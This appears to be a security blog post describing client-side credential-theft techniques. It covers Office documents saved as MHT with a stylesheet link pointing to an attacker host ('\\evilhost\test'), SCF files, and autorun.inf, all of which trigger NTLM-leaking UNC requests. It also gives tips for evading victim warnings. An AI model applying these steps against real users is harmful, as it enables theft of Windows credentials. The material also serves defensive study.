Let's continue our talk about variants of client-side attacks and turn our attention to MS Office's documents.As it was written in last blog post, we can create crafted Office's document and send it to users (via e-mail for example). When a user opens it, an office program tries to connect our server and give us user's credential.
Such situation is available because:
- Almost all MS Office programs have capability to read "html"-file or "mht"-file*.
- MS Office's documents can be saved as "html"-file or "mht"-file* without loss of document's formatting.
- MS Office programs detect how to parse and process a document by it's content, not by file extension.
*"mht"-file - MHTML, short for MIME HTML, is a web page archive format.
Thereby, we should do next sequence for creating crafted MS Office's document.
We save any office document as "html"-file or "mht"-file. The second is better because there will be created only one file which contains all parts of the documents.
Then we change (or create) "HREF" attribute of "LINK rel=stylesheet" element from default value to a link to our server. Then we rename the file to a normal office document extension (doc for example). A crafted document is ready. The method is very simple as we can see.
Example of code: <link rel=stylesheet href="\\evilhost\test">
I want to mark out next interesting features.
Office programs understand "HREF" attribute both with a UNC path (\\evilhost\test) and with a HTTP path (http://evilhost/test). So we can catch user's credentials via HTTP with NTLM.
MS Office programs show an attention to our victim if it couldn't download content from a remote resource. This isn't good. So we should put a document which we created for a victim on our shared resource. And when MS Office program opens a crafted document, it takes style sheet from our shared resource and doesn't show an attention to a victim.
Windows Explorer and shared resources
In addition to the last blog post, we have found some specified files, which can give us necessary UNC-request from a user without attention to him.
All of us know about "autorun.inf" and problems which it gives to common users via many kinds of viruses. Thereby, there are interesting things: autorun.inf can cause UNC-request by Explorer and it works with a Mapped Network Drives. But a last patch for Windows OS disables the Autorun functionality.
- .SCF file - Explorer Shell Command File.
This is a special file type, which contains commands for Windows Explorer. The example of such file is "ToggleDesktop" button. But information about all commands and all capabilities of the file type is not available. But this file extension "is one of the special ones that remains hidden even if you instruct Windows to show file extensions".
For our purpose we can create or use any file, add next code to it and add ".SCF" to file extension. An original file extension will be shown to a user, but Explorer will see .scf and perform all the commands in that are in this file. Explorer gives user's credential when user looks at folder with such .scf file.
Thanks for your attention.